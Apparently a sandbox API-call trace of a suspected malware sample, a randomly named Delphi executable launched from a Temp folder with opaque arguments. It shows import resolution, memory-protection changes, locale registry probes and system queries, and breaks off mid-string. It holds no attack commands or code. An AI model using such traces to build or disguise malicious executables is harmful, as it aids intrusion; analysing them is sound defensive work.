0x7695ca64 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0108.377] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0108.377] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0108.379] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0108.379] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0108.379] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0108.380] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0108.380] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0108.380] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0108.380] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0108.380] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0108.380] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0108.381] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0108.381] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0108.381] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0108.381] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0108.381] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0108.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0108.381] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0108.381] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0108.381] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0108.382] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0108.382] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0108.382] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0108.382] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0108.383] SetThreadLocale (Locale=0x400) returned 1 [0108.383] GetVersion () returned 0x1db10106 [0108.383] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.383] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0108.383] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.383] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0108.383] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.383] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0108.383] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0108.383] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.383] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0108.383] GetACP () returned 0x4e4 [0108.384] GetCurrentThreadId () returned 0xcb8 [0108.384] GetVersion () returned 0x1db10106 [0108.384] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x291cc8, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0108.384] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0x30 [0108.384] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0x30 [0108.384] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1300000 [0108.384] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.384] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.384] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.384] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.384] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.384] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.385] GetUserDefaultUILanguage () returned 0x409 [0108.386] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0108.386] GetThreadUILanguage () returned 0x120409 [0108.386] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0108.386] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768) returned 1 [0108.386] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0108.386] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0108.386] GetUserDefaultUILanguage () returned 0x409 [0108.386] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0108.387] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0108.387] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0108.388] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0108.388] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0108.388] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2a4460 [0108.388] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0108.388] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 